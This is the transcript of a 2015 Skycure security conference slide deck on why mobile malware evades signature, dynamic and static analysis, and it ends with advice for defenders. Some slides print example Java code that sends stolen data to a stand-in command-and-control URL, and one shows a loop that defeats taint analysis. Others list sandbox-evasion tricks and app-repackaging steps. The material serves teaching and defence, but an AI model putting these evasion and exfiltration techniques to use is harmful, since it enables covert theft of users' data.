title of presentation dd/mm/yyyy © 2015 skycure 1 1 1 why are hackers winning the mobile malware...

28
Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Upload: clementine-hutchinson

Post on 18-Jan-2016

212 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 11

1

Why Are Hackers Winning the Mobile

Malware Battle

Page 2: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 22

2

Introductions

Yair AmitCTO, Co-FounderSkycure

15+ Patents

IDF 8200

Page 3: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 33

3

Agenda

• The Mobile Security Landscape• Evolution of App Stores & Mobile Malware• Popular Mobile Malware Analysis Techniques

- Signature-Based, Dynamic & Static Analysis- Why Do They Fail?

• Demo• So What Can Defenders Do?

Page 4: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 44

4

Modern Mobile Attacks

Page 5: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 55

5

Theft

Unauthorized Access

Loss

Page 6: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 66

6

24/7exposure

Off-the-shelf hacking

tools

WiFi&

cellular

Page 7: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 77

7

0 1 Month 2 Months 3 Months 4 Months0%

10%

20%

30%

40%

50%

0%

25%

30%

38%

43%

0%

23%

30%

35%

41%

Affected Devices Over Time

2015 2014

% a

ffec

ted

dev

ices

Based on Skycure Threat Intelligence

Page 8: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 88

8

External Android stores

Repackaged apps

iOSimpact

Page 9: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 99

9

OS&

app-level

Patching challenges

Never-endingstory

Page 10: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 1010

10

Mobile Malware

Page 11: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 1111

11

Evolution of Android Malware

Google introduces technologies such as “Bouncer” and “Verify Apps”

Google Play is riddled with malware 2011

3rd party stores are riddled with malware 2015

Page 12: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 1212

12

Malware Analysis Techniques

Page 13: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 1313

13

Signature-Based Analysis

Page 14: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 1414

14 14

Dynamic AnalysisUber FlashlightUber Flashlight Identification techniques:

• Network activity• Debugging• Instrumentation• Etc.

Page 15: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 1515

15

Bypassing Dynamic Analysis

• Make sure the malicious code is not executed during the analysis

• Examples:- Time bombs

• Location bombs, IP bombs, etc.

- Sandbox detection• Is the contact list full and “real”?

• Same for meetings, emails, accounts, etc.

• Am I running in a debugger? [Anti debugging]

- Victim detection• Targeted attacks

• Trick the detection module

Page 16: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 1616

16 16

Static Analysis

Static analysis unpacks the app and analyses its code & resources

Page 17: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 1717

1717

// ... String deviceName = getDeviceName();

// ... "&senesitiveData=" + data

// ...

String data = getSensitiveData();

String data2 = ……………………………………………………… + data

PostRequest("http://www.remote.cnc/data.php", data2);

String data = getSensitiveData();

String data2 = "DeviceName=" + deviceName +

PostRequest("http://www.remote.cnc/data.php", data2);

Static Analysis (in detail)

Source – a method returning sensitive data

Sink - a methodleaking out data

Page 18: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 1818

18

18

Static Analysis (taint analysis example)Sources:

Sinks:

Page 19: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 1919

19

Bypassing Static Analysis

• Exploiting the Static Analysis FP/FN tradeoff- Arrays, files, etc.

String data = getSensitiveData();String data2 = "";for (int i=0; i<data.length(); i++) { if (data.charAt(i) == 'a') data2 += 'a'; if (data.charAt(i) == 'b') data2 += 'b';

...}PostRequest("http://www.remote.cnc/data.php", data2);

Page 20: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 2020

20

Bypassing Static Analysis

• Exploiting the Static Analysis FP/FN tradeoff- Arrays, files, etc.

• Dynamic flows• Dynamic code

- Reflection- Remote server

• DEX/apk• HTML & JavaScript (also applicable for iOS)

Page 21: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 2121

21

Bypassing Advanced Techniques

Analyzer

How can you detect malware code if you don’t see it?

Naive codereturned

Get code to execute

Malicious code

Malicious code

Malicious code

Page 22: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 2222

22

Let’s Make It Concrete

Page 23: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 2323

23

App Repackaging - The Steps

• Choose and download a popular app• Decode the app• Patch the decoded app

- to load remote code from server

• Rebuild the patched app• Sign the app with newly generated keys• Send to victim(s)

• At attacker’s will, change remote code to be malicious

Page 24: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 2424

24

Live Demo

Page 25: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 2525

25

Stealthy Malware – Next Steps

• What about the CNC Server? Can it be blacklisted?

Analyzer

Naive codereturned

Get code to execute

Malicious code

Malicious code

Malicious code

Page 26: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 2626

26

So What Can Defenders Do?

• Change the paradigm:- Analyzing an app by itself is not enough- Utilize analysis of similar apps on other devices

• Crowd-wisdom intelligence:- Compare app traits to all millions of apps that have been

seen before- Ability to track legitimate app behaviors- Ability to track malicious app behaviors

Page 27: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 2727

27

Apply What You Have Learned

• Utilize a combined approach to fight mobile malware- Signature-based analysis- Static analysis- Dynamic analysis- Crowd intelligence

• Remember- Malware is only one element of mobile threat landscape- Mobile Threat Defense solution should address all

threats

Page 28: Title of Presentation DD/MM/YYYY © 2015 Skycure 1 1 1 Why Are Hackers Winning the Mobile Malware Battle

Title of Presentation DD/MM/YYYY© 2015 Skycure 2828

28

Q&A And Next Steps

[email protected]

https://www.skycure.com

https://blog.skycure.com

https://maps.skycure.com

@YairAmit, @SkycureSecurity

/Skycure